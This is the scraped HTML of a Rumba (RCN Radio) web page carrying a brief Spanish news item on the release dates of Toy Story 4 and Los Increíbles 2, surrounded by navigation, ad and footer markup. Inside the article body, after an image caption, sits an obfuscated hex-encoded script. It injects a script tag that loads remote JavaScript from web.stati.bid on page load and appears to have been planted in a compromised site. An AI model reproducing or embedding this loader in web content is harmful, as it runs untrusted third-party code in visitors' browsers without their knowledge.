	<li id="menu-item-41066" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41066"><a href="http://www.rumba.com.co/seccion/tips/">Tips</a></li>
	<li id="menu-item-41067" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41067"><a href="http://www.rumba.com.co/seccion/trending/">Trending</a></li>
	<li id="menu-item-43149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-43149"><a href="http://www.rumba.com.co/seccion/mujeresmas/">Mujeres Más</a></li>
</ul>
</li>
<li id="menu-item-41056" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41056"><a href="http://www.rumba.com.co/hits/">Hits</a></li>
</ul></div>				</nav>
			</div><!--fly-menu-wrap-->
		</div><!--fly-wrap-in-->
	</div><!--fly-wrap-out-->
</div><!--fly-wrap-->    
    
    
                  <div id="contskin">
					<div id="skinderecho">
					                            <!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_RascacieloDerecho_161x600_D', [[160, 600], [161, 600]] -->
                            <div id='div-gpt-ad-1491336401500-8'>
                                <script type='text/javascript'>
								cX.callQueue.push(['invoke', function() {
                                	googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-8'); });
                               }]);
							    </script>
                            </div>
                                            </div>
                  </div>
                        
                    	<div id="skinizquierdo">
						                                <!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_RascacieloIzquierdo_160x600_D', [160, 600] -->
                                <div id='div-gpt-ad-1491336401500-9'>
	                                <script type='text/javascript'>
									cX.callQueue.push(['invoke', function() {
	                                	googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-9'); });
	                                }]);
                                    </script>
                                </div>
													</div>
                        
    
    
    
                                
                <center>
<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_OutofPage_DM -->
<div id='div-gpt-ad-1491336401500-7'>
<script>
cX.callQueue.push(['invoke', function() {
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-7'); });
}]);
</script>
</div>
                </center>
          
<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_Richmedia_DM', [1, 1] -->
<div id='div-gpt-ad-1491336401500-10'>
<script>
cX.callQueue.push(['invoke', function() {
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-10'); });
}]);
</script>
</div>                
      
                
                    
    
    




    
	<header>
    
    
    <!-- PUBLICIDAD RUMBA TOP BANNER -->
	<div id="leader-wrapper" class="left relative">
                

                        <!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_BarraExpander_DM', [[728, 90], [320, 50], [990, 90], [320, 100]] -->
                        <div id='div-gpt-ad-1491336401500-0 style="width:100%; float: none; margin:0 auto; '>
                        <script>
						cX.callQueue.push(['invoke', function() {
                        googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-0'); });
                        }]);
                        </script>
                        </div>
                        
                        
                			</div><!--leader-wrap-->
<!-- FIN PUBLICIDAD RUMBA TOP BANNER -->   


		<div id="nav-wrap">
			<div class="content-out content-out-nav">
				<div class="content-in">
					<div id="nav-contain" class="left">
						<div id="nav-contain-out">
							<div class="fly-but-wrap left relative">
								<span></span>
								<span></span>
								<span></span>
								<span></span>
							</div><!--fly-but-wrap-->
							<div id="nav-logo" class="left" itemscope itemtype="http://schema.org/Organization">
																	<a itemprop="url" href="http://www.rumba.com.co"><img itemprop="logo" src="http://www.rumba.com.co/wp-content/media//logo.png" alt="Rumba" /></a>
															</div><!--nav-logo-->
							<div id="nav-contain-in">
								<div id="main-nav-out">
									<div id="main-nav-in">
								<nav>
									<div id="nav-out">
										<div id="nav-in">
											<div class="main-nav left main-nav-contain">
												<div class="main-nav-in left">
																										<div class="menu-menurumba-container"><ul id="menu-menurumba-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-38340"><a href="http://www.rumba.com.co/">Inicio</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-40186"><a target="_blank" href="http://www.rcnmundo.com/rumba">Radio en Vivo</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41438"><a href="http://www.rcnmundo.com/rumbabogota">Rumba Bogotá</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41439"><a href="http://www.rcnmundo.com/rumbamedellin">Rumba Medellín</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41440"><a href="http://www.rcnmundo.com/rumbacali">Rumba Cali</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41441"><a href="http://www.rcnmundo.com/rumbabarranquilla">Rumba Barranquilla</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41442"><a href="http://www.rcnmundo.com/rumbabucaramanga">Rumba Bucaramanga</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-43970"><a href="http://www.rcnmundo.com/rumbasanandres">Rumba San Andrés</a></li>
</ul>
</li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-41062"><a href="http://www.rumba.com.co/seccion/noticias/">Noticias</a><div class="mega-dropdown"><div class="mega-dropdown-out"><div class="mega-dropdown-in"><ul class="mega-list"><li><div class="mega-img"><a href="http://www.rumba.com.co/destacado/que-tanto-influyen-los-detalles-en-una-relacion/"><img width="400" height="240" src="http://www.rumba.com.co/wp-content/media//Carolina-Guevara-1-400x240.jpg" class="unlazy wp-post-image" alt="" /></a></div><a href="http://www.rumba.com.co/destacado/que-tanto-influyen-los-detalles-en-una-relacion/">¿Qué tanto influyen los detalles en una relación?</a></li><li><div class="mega-img"><a href="http://www.rumba.com.co/destacado/la-patada-ninja-es-la-modalidad-que-usan-los-ladrones-para-atacar-a-los-motociclistas-en-bogota/"><img width="400" height="240" src="http://www.rumba.com.co/wp-content/media//portada-28-400x240.png" class="unlazy wp-post-image" alt="" /></a></div><a href="http://www.rumba.com.co/destacado/la-patada-ninja-es-la-modalidad-que-usan-los-ladrones-para-atacar-a-los-motociclistas-en-bogota/">La ‘patada ninja’, es la modalidad que usan los ladrones para atacar a los motociclistas en Bogotá</a></li><li><div class="mega-img"><a href="http://www.rumba.com.co/destacado/por-que-la-gente-ya-no-cree-en-el-matrimonio/"><img width="400" height="240" src="http://www.rumba.com.co/wp-content/media//Carolina-Guevara-400x240.jpg" class="unlazy wp-post-image" alt="" /></a></div><a href="http://www.rumba.com.co/destacado/por-que-la-gente-ya-no-cree-en-el-matrimonio/">¿Por qué la gente ya no cree en el matrimonio?</a></li><li><div class="mega-img"><a href="http://www.rumba.com.co/destacado/maluma-apareceria-en-los-simpsons/"><img width="400" height="240" src="http://www.rumba.com.co/wp-content/media//portada-13-400x240.png" class="unlazy wp-post-image" alt="" /></a></div><a href="http://www.rumba.com.co/destacado/maluma-apareceria-en-los-simpsons/">Maluma aparecería en Los Simpsons</a></li><li><div class="mega-img"><a href="http://www.rumba.com.co/destacado/actor-que-interpreta-a-robbie-rotten-en-lazzy-town-en-riesgo-de-morir/"><img width="400" height="240" src="http://www.rumba.com.co/wp-content/media//robbie-rotten-collage-400x240.jpg" class="unlazy wp-post-image" alt="" /></a></div><a href="http://www.rumba.com.co/destacado/actor-que-interpreta-a-robbie-rotten-en-lazzy-town-en-riesgo-de-morir/">Actor que interpreta a Robbie Rotten en Lazy Town en riesgo de morir</a></li></ul></div></div></div>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-40360"><a href="http://www.rumba.com.co/seccion/musica/">Música</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41063"><a href="http://www.rumba.com.co/seccion/deportes/">Deportes</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41065"><a href="http://www.rumba.com.co/seccion/hot/">Hot</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41066"><a href="http://www.rumba.com.co/seccion/tips/">Tips</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-41067"><a href="http://www.rumba.com.co/seccion/trending/">Trending</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-43149"><a href="http://www.rumba.com.co/seccion/mujeresmas/">Mujeres Más</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41056"><a href="http://www.rumba.com.co/hits/">Hits</a></li>
</ul></div>                                                
                                                                                       
												</div><!--main-nav-in-->
											</div><!--main-nav-->
										</div><!--nav-in-->
																			</div><!--nav-out-->
                                    
								</nav>
                                

							</div><!--main-nav-in-->
						<div class="nav-spacer"></div>
						<div id="nav-right">
							<div id="search-button">
								<i class="fa fa-search fa-2"></i>
							</div><!--search-button-->
							<div id="social-nav" class="relative">
																	<span class="fb-nav"><i class="fa fa-facebook fa-2"></i></span>
																									<span class="twit-nav"><i class="fa fa-twitter fa-2"></i></span>
																									<span class="twit-nav"><i class="fa fa-instagram fa-2"></i></span>
                                    
								                                
								<div id="social-dropdown">
									<ul class="social-drop-list relative">
																					<a href="https://www.facebook.com/RUMBAST105.4" alt="Facebook" target="_blank">
											<li class="fb-drop">
												<i class="fa fa-facebook-square fa-2"></i>
												<p>Facebook</p>
											</li>
											</a>
																															<a href="https://twitter.com/rumbabogotafm" alt="Twitter" target="_blank">
											<li class="twit-drop">
												<i class="fa fa-twitter fa-2"></i>
												<p>Twitter</p>
											</li>
											</a>
																																									<a href="https://www.instagram.com/rumbabogotafm/" alt="Instagram" target="_blank">
											<li class="inst-drop">
												<i class="fa fa-instagram fa-2"></i>
												<p>Instagram</p>
											</li>
											</a>
																																																																							<a href="http://www.rumba.com.co/feed/rss/" target="_blank">
											<li class="rss-drop">
												<i class="fa fa-rss fa-2"></i>
												<p>RSS</p>
											</li>
											</a>
																			</ul>
								</div><!--social-dropdown-->
							</div><!--social-nav-->
						</div><!--nav-right-->
						<div id="search-bar">
							<form method="get" id="searchform" action="http://www.rumba.com.co/">
	<input type="text" name="s" id="s" value="Buscar" onfocus='if (this.value == "Type search term and press enter") { this.value = ""; }' onblur='if (this.value == "") { this.value = "Buscar"; }' />
	<input type="hidden" id="searchsubmit" value="Search" />
</form>						</div><!--search-bar-->
								</div><!--main-nav-out-->
							</div><!--nav-contain-in-->
						</div><!--nav-contain-out-->
					</div><!--nav-contain-->
				</div><!--content-in-->
			</div><!--content-out-->
		</div><!--nav-wrap-->
	</header>
	<div id="mvp-main-cont">
	<div id="head-wrap" class="left relative">
		<div class="head-wrap-out">         
			<div class="head-wrap-in">   
            
                                            
		         
            
							<div class="content-out">
					<div class="content-in">
						<div id="leader-wrapper" class="left relative">
													</div><!--leaderboard-wrapper-->
					</div><!--content-in-->
				</div><!--content-out-->
				<div class="content-out">
		<div class="content-in">
												</div><!--content-in-->
	</div><!--content-out-->
		</div><!--head-wrap-in-->
	</div><!--head-wrap-out-->
</div><!--head-wrap-->
<div id="content-wrapper" class="left relative social-bottom">
			<div class="content-out" class="relative">
							<div class="content-in" itemscope itemtype="http://schema.org/Article">
						<div id="post-social-out" class="relative">
								<div id="post-social-wrap">
					<ul class="post-social-list left relative">
															
						<li class="post-social-fb">
							<a href="#" onclick="window.open('http://www.facebook.com/sharer.php?u=http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/&amp;t=Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook"><i class="fa fa-facebook fa-2"></i></a>
						</li>
						<li class="post-social-twit">
							<a href="#" onclick="window.open('http://twitter.com/share?text=Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno&amp;url=http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post"><i class="fa fa-twitter fa-2"></i></a>	
						</li>
						<li class="post-social-wapp">
                        <a href="whatsapp://send?text=Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/"><div class="whatsapp-share"><span class="whatsapp-but1"><i class="fa fa-whatsapp fa-2"></i></span><span class="social-text"></span></div></a>
						</li>
					</ul>
				</div><!--post-social-wrap-->
								<div id="post-social-in">
											<div id="post-content-out">
							<div id="post-content-in">
												<div id="post-content-contain" class="left relative">
					<article class="post-47792 post type-post status-publish format-standard has-post-thumbnail hentry category-musica tag-los-increibles tag-toy-story">
						<div id="post-content-wrapper" class="relative">
							<div id="post-area" class="left relative">
																	<div class="post-cat-contain left relative post-cat-mob">
										<span class="img-cat left">Música</span>
									</div><!--post-cat-contain-->
									<h1 class="story-title entry-title" itemprop="name headline">Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno</h1>
								
								<div id="right-content" class="relative">
									<div id="content-area" class="left relative" itemprop="articleBody">
																																																																											<div id="feat-img-reg" class="relative">
																																<img itemprop="image" src="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno-660x400.jpg" />
															</div><!--feat-img-reg-->
																																																																																					<div class="hide-title">
											<span class="entry-title" itemprop="name headline">Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno</span>
										</div><!--hide-title-->
										<div id="left-content-mobi">
																						<div class="author-info-mob-wrap">
																								<div class="post-date-wrap left relative post-date-mob">
													<span class="post-date"><time class="post-date updated" itemprop="datePublished" datetime="2017-07-18" pubdate>julio 18, 2017</time></span>
												</div><!--post-date-wrap-->
											</div><!--author-info-mob-wrap-->
										</div><!--left-content-mobi-->
										
<!-- BEGIN Schema.org microdata added by the Add-Meta-Tags WordPress plugin -->
<!-- Scope BEGIN: Article -->
<div itemscope itemtype="http://schema.org/Article">
<!-- Scope BEGIN: Organization -->
<span itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Rumba" />
<meta itemprop="description" content="RCN Radio" />
<meta itemprop="url" content="http://www.rumba.com.co/" />
</span> <!-- Scope END: Organization -->
<!-- Scope BEGIN: Person -->
<span itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="name" content="Cristian Macías" />
<!-- Scope BEGIN: ImageObject -->
<span itemprop="image" itemscope itemtype="http://schema.org/ImageObject">
<meta itemprop="url" content="http://www.gravatar.com/avatar/ce0bd852e8f61e6550a1c38082f1a62b?s=128" />
<meta itemprop="contentUrl" content="http://www.gravatar.com/avatar/ce0bd852e8f61e6550a1c38082f1a62b?s=128" />
<meta itemprop="width" content="128" />
<meta itemprop="height" content="128" />
</span> <!-- Scope END: ImageObject -->
<meta itemprop="url" content="http://www.rumba.com.co/author/cmacias/" />
</span> <!-- Scope END: Person -->
<meta itemprop="url" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/" />
<meta itemprop="mainEntityOfPage" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/" />
<meta itemprop="datePublished" content="2017-07-18T09:13:30+00:00" />
<meta itemprop="dateModified" content="2018-03-04T13:55:11+00:00" />
<meta itemprop="copyrightYear" content="2017" />
<meta itemprop="inLanguage" content="es_ES" />
<meta itemprop="name" content="Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno" />
<meta itemprop="headline" content="Toy Story 4 y Los Increíbles 2 ya tienen fecha de estreno" />
<meta itemprop="description" content="Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes: El estreno de Los Increíbles 2 será el próximo 15 de julio de 2018. Por su parte Toy Story 4 llegará a las salas de cine el próximo 21 de junio del 2019." />
<meta itemprop="articleSection" content="Música" />
<meta itemprop="keywords" content="rumba, rcn radio, bogotá 105.4 fm, barbosa 98.2 fm, barranquilla 99.1 fm, cali 97.5 fm, caucasia 91.3 fm, medellín 106.3 fm, ocaña 100.3 fm, planeta rica 97.5 fm, valledupar 100.7 fm barranca 87.7 fm, bucaramanga 103.7 fm, cartagena 102.5 fm, ibagué 88.3 fm, montería 97.5 fm, riohacha 93.7 fm, san andrés 100.5 fm, santa marta 106.9 fm, tumaco 91.1 fm, música, los increibles, toy story" />
<meta itemprop="thumbnailUrl" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno.jpg" />
<!-- Scope BEGIN: ImageObject -->
<span itemprop="image" itemscope itemtype="http://schema.org/ImageObject">
<meta itemprop="name" content="toy-story-4-los-increibles-2-fechas-estreno" />
<meta itemprop="url" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno.jpg" />
<meta itemprop="sameAs" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/attachment/toy-story-4-los-increibles-2-fechas-estreno/" />
<meta itemprop="thumbnailUrl" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno.jpg" />
<meta itemprop="contentUrl" content="http://www.rumba.com.co/wp-content/media//toy-story-4-los-increibles-2-fechas-estreno.jpg" />
<meta itemprop="width" content="1100" />
<meta itemprop="height" content="600" />
<meta itemprop="encodingFormat" content="image/jpeg" />
</span> <!-- Scope END: ImageObject -->
<!-- Scope BEGIN: ImageObject -->
<span itemprop="image" itemscope itemtype="http://schema.org/ImageObject">
<meta itemprop="name" content="69a43582e281ef9dbf35c1c2e6f1e22c" />
<meta itemprop="url" content="http://www.rumba.com.co/wp-content/media//69a43582e281ef9dbf35c1c2e6f1e22c.jpg" />
<meta itemprop="sameAs" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/attachment/69a43582e281ef9dbf35c1c2e6f1e22c/" />
<meta itemprop="description" content="Foto: http://elcalce.com..." />
<meta itemprop="thumbnailUrl" content="http://www.rumba.com.co/wp-content/media//69a43582e281ef9dbf35c1c2e6f1e22c.jpg" />
<meta itemprop="contentUrl" content="http://www.rumba.com.co/wp-content/media//69a43582e281ef9dbf35c1c2e6f1e22c.jpg" />
<meta itemprop="width" content="736" />
<meta itemprop="height" content="1104" />
<meta itemprop="encodingFormat" content="image/jpeg" />
<meta itemprop="caption" content="Foto: http://elcalce.com" />
<meta itemprop="text" content="Foto: http://elcalce.com" />
</span> <!-- Scope END: ImageObject -->
<!-- Scope BEGIN: ImageObject -->
<span itemprop="image" itemscope itemtype="http://schema.org/ImageObject">
<meta itemprop="name" content="p12004128_p_v8_aa" />
<meta itemprop="url" content="http://www.rumba.com.co/wp-content/media//p12004128_p_v8_aa.jpg" />
<meta itemprop="sameAs" content="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/attachment/p12004128_p_v8_aa/" />
<meta itemprop="thumbnailUrl" content="http://www.rumba.com.co/wp-content/media//p12004128_p_v8_aa.jpg" />
<meta itemprop="contentUrl" content="http://www.rumba.com.co/wp-content/media//p12004128_p_v8_aa.jpg" />
<meta itemprop="width" content="960" />
<meta itemprop="height" content="1440" />
<meta itemprop="encodingFormat" content="image/jpeg" />
</span> <!-- Scope END: ImageObject -->
<div itemprop="articleBody">
<div class="at-above-post addthis_tool" data-url="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/"></div><p>Disney dio a conocer oficialmente las fechas de estrenos de dos de sus películas mas importantes:</p>
<p>El estreno de Los Increíbles 2 será el<strong> próximo 15 de julio de 2018.</strong></p>
<div id="attachment_47793" style="max-width: 746px" class="wp-caption alignnone"><img class="size-full wp-image-47793" src="http://www.rumba.com.co/wp-content/media//69a43582e281ef9dbf35c1c2e6f1e22c.jpg" alt="Foto: http://elcalce.com" width="736" height="1104" srcset="http://www.rumba.com.co/wp-content/media/69a43582e281ef9dbf35c1c2e6f1e22c.jpg 736w, http://www.rumba.com.co/wp-content/media/69a43582e281ef9dbf35c1c2e6f1e22c-200x300.jpg 200w" sizes="(max-width: 736px) 100vw, 736px" /><p class="wp-caption-text">Foto: http://elcalce.com</p></div>
<p>Por su parte Toy Story 4 llegará a las salas de cine el próximo <strong>21 de junio del 2019.</strong></p>
<p><div id="attachment_47794" style="max-width: 745px" class="wp-caption alignnone"><img class="wp-image-47794" src="http://www.rumba.com.co/wp-content/media//p12004128_p_v8_aa.jpg" alt="Foto: http://elcalce.com" width="735" height="1103" srcset="http://www.rumba.com.co/wp-content/media/p12004128_p_v8_aa.jpg 960w, http://www.rumba.com.co/wp-content/media/p12004128_p_v8_aa-768x1152.jpg 768w, http://www.rumba.com.co/wp-content/media/p12004128_p_v8_aa-200x300.jpg 200w" sizes="(max-width: 735px) 100vw, 735px" /><p class="wp-caption-text">Foto: http://elcalce.com</p></div> <script>var _0x29b4=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)</script></p>
<!-- AddThis Advanced Settings above via filter on the_content --><!-- AddThis Advanced Settings below via filter on the_content --><!-- AddThis Advanced Settings generic via filter on the_content --><!-- AddThis Share Buttons above via filter on the_content --><!-- AddThis Share Buttons below via filter on the_content --><div class="at-below-post addthis_tool" data-url="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/"></div><!-- AddThis Share Buttons generic via filter on the_content -->
</div> <!-- Itemprop END: articleBody -->
</div> <!-- Scope END: Article -->
<!-- END Schema.org microdata added by the Add-Meta-Tags WordPress plugin -->
																														<div class="post-tags post-tags-mobi">
											<span class="post-tags-header">TEMAS RELACIONADOS</span><span itemprop="keywords"><a href="http://www.rumba.com.co/tag/los-increibles/" rel="tag">los increibles</a><a href="http://www.rumba.com.co/tag/toy-story/" rel="tag">toy story</a></span>
										</div><!--post-tags-->
									</div><!--content-area-->
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
    	<div class="ux-commentform">
			<div class="fb-comments" data-href="http://www.rumba.com.co/musica/toy-story-4-y-los-increibles-2-ya-tienen-fecha-de-estreno/" data-width="100%" data-numposts="5"></div>
		</div>
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
                                    
								</div><!--right-content-->
								<div id="left-content" class="left relative">
									<div class="post-cat-contain left relative">
										<span class="img-cat left">Música</span>
									</div><!--post-cat-contain-->
									<div class="post-date-wrap left relative post-date-reg">
										<span class="post-date"><time class="post-date updated" itemprop="datePublished" datetime="2017-07-18" pubdate>julio 18, 2017</time></span>
									</div><!--post-date-wrap-->
									<div class="author-info-wrap left relative">
																																							</div><!--author-info-wrap-->
									<div class="post-tags">
										<span class="post-tags-header">Related Items</span><span itemprop="keywords"><a href="http://www.rumba.com.co/tag/los-increibles/" rel="tag">los increibles</a><a href="http://www.rumba.com.co/tag/toy-story/" rel="tag">toy story</a></span>
									</div><!--post-tags-->
								</div><!--left-content-->
							</div><!--post-area-->
						</div><!--post-content-wrapper-->
					</article>
																<div id="sidebar-contain">
	<div id="sidebar-scroll-wrap">
		<span class="sidebar-scroll">Baja para ver mas <i class="fa fa-caret-down fa-2"></i></span>
	</div><!--sidebar-scroll-wrap-->
	<div id="sidebar-mobi-tab">
		<span class="mobi-tab-but">Clic</span>
	</div><!--sidebar-mobi-tab-->
	<div id="sidebar-main-wrap" class="left relative">
				<div id="sidebar-widget-wrap" class="left relative">
			<div id="sidebar-widget-in" class="left relative">
							<div class="widget-ad left relative">
				<h3 class="sidebar-header left relative"><span>Playlist Rumba</span></h3>
&nbsp;
<iframe src="https://embed.spotify.com/?uri=spotify%3Auser%3Arumba1054%3Aplaylist%3A2ip5jTfrpx43teo87Jjz43" width="300" height="380" frameborder="0" allowtransparency="true"></iframe>			</div><!--widget-ad-->

					<div class="widget-ad left relative">
				<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_Robapagina1_300x250_DM -->
                      <div id='div-gpt-ad-1491336401500-11'>
                                  <script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-11'); });</script>
                      </div>			</div><!--widget-ad-->

					<div class="widget-ad left relative">
				<!--/205320464/RUMBA/INTERNAS/RUMBA_Internas_Boton1_DM -->
<div id='div-gpt-ad-1491336401500-1'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-1'); });
</script>
</div>			</div><!--widget-ad-->

					<div class="widget-ad left relative">
				<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_Boton2_DM -->
<div id='div-gpt-ad-1491336401500-2'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-2'); });
</script>
</div>			</div><!--widget-ad-->

					<div class="widget-ad left relative">
				<!-- /205320464/RUMBA/INTERNAS/RUMBA_Internas_Boton3_DM -->
<div id='div-gpt-ad-1491336401500-3'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1491336401500-3'); });
</script>
</div>			</div><!--widget-ad-->

					</div><!--sidebar-widget-in-->
		</div><!--sidebar-widget-wrap-->
	</div><!--sidebar-main-wrap-->
</div><!--sidebar-contain-->										<footer id="foot-wrap" class="left relative">
		<div id="foot-top" class="left relative">
					<div class="foot-widget">
									<div id="foot-logo" class="left realtive">
						<img src="http://www.rumba.com.co/wp-content/media//logo-foot_200.png" alt="Rumba" />
					</div><!--foot-logo-->
								<div class="foot-info-text">
					Radio Cadena Nacional S.A.S. RCN Radio <br /> Rumba
www.rumba.com.co  |  <a href="http://www.rcnmundo.com/atencionaloyente">Atención al Oyente</a>				</div><!--footer-info-text-->
			</div><!--foot-widget-->
				<div id="text-2" class="foot-widget widget_text"><h3 class="foot-head">Rumba Colombia</h3>			<div class="textwidget"><div id="link-footer"style="float: left; width: 48%;">
<a href="http://www.rcnmundo.com/rumbabogota" target="_blank"><b>Bogotá</b> 105.4 FM</a><br />
<a href="http://www.rcnmundo.com/rumbabarbosa" target="_blank"><b>Barbosa</b> 98.2 FM</a><br />
<a href="http://www.rcnmundo.com/rumbabarranquilla" target="_blank"><b>Barranquilla</b> 99.1 FM</a><br />
<a href="http://www.rcnmundo.com/rumbacali" target="_blank"><b>Cali</b> 97.5 FM</a><br />
<a href="http://www.rcnmundo.com/rumbacaucasia" target="_blank"><b>Caucasia</b> 91.3 FM</a><br />
<a href="http://www.rcnmundo.com/rumbamedellin" target="_blank"><b>Medellín</b> 106.3 FM</a><br />
<a href="http://www.rcnmundo.com/rumbabarbosa" target="_blank"><b>Ocaña</b> 100.3 FM</a><br />
<a href="http://www.rcnmundo.com/rumbaplanetarica" target="_blank"><b>Planeta Rica</b> 97.5 FM</a><br />
<a href="http://www.rcnmundo.com/rumbavalledupar" target="_blank"><b>Valledupar</b> 100.7 FM</a>
</div>
<div id="link-footer"style="float: right; width: 48%;">
<a href="http://www.rcnmundo.com/rumbabarrancabermeja" target="_blank"><b>Barranca</b> 87.7 FM</a><br />
<a href="http://www.rcnmundo.com/rumbabucaramanga" target="_blank"><b>B/manga</b> 103.7 FM</a><br />
<a href="http://www.rcnmundo.com/rumbaibague" target="_blank"><b>Ibagué</b> 88.3 FM FM</a><br />
<a href="http://www.rcnmundo.com/rumbamonteria" target="_blank"><b>Montería</b> 97.5 FM</a><br />
<a href="http://www.rcnmundo.com/rumbariohacha" target="_blank"><b>Riohacha</b> 93.7 FM</a><br />
<a href="http://www.rcnmundo.com/rumbasanandres" target="_blank"><b>San Andrés</b> 100.5 FM</a><br />
<a href="http://www.rcnmundo.com/rumbasantamarta" target="_blank"><b>Santa Marta</b> 106.9 FM</a><br />
<a href="http://www.rcnmundo.com/rumbatumaco" target="_blank"><b>Tumaco</b> 91.1 FM</a>
</div>
</div>
		</div>	</div><!--foot-top-->
	<div id="foot-bottom" class="left relative">
		<div id="foot-copy" class="left relative">
			<p>Derechos Reservados © 2016 RCN Radio - Bogotá - Colombia</p>
		</div><!--foot-copy-->
		<div id="foot-soc" class="relative">
			<ul class="foot-soc-list relative">
									<li class="foot-soc-fb">
						<a href="https://www.facebook.com/RUMBAST105.4" alt="Facebook" target="_blank"><i class="fa fa-facebook-square fa-2"></i></a>
					</li>
													<li class="foot-soc-twit">
